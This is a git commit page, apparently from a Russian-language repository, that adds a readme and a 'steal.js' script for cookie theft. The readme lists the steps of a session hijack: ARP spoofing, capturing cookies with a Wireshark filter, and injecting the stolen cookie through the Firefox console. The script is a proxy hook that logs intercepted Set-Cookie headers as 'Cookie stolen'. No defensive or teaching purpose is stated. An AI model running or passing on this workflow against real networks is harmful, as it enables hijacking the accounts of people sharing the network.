Загрузить файлы в «arpspoofing/coockie»
This commit is contained in:
16
arpspoofing/coockie/readme.txt
Normal file
16
arpspoofing/coockie/readme.txt
Normal file
@@ -0,0 +1,16 @@
|
||||
|
||||
|
||||
run arpspoofing
|
||||
|
||||
run wireshark and filter "http.cookie"
|
||||
|
||||
|
||||
|
||||
|
||||
run in console firefox for inject cookie:
|
||||
|
||||
document.cookie = "sniffing cookie; domain=.domain.com; path=/; Secure";
|
||||
|
||||
|
||||
|
||||
|
||||
5
arpspoofing/coockie/steal.js
Normal file
5
arpspoofing/coockie/steal.js
Normal file
@@ -0,0 +1,5 @@
|
||||
function onResponse(req, res) {
|
||||
if (res.Headers['Set-Cookie']) {
|
||||
console.log('Cookie stolen: ' + res.Headers['Set-Cookie']);
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user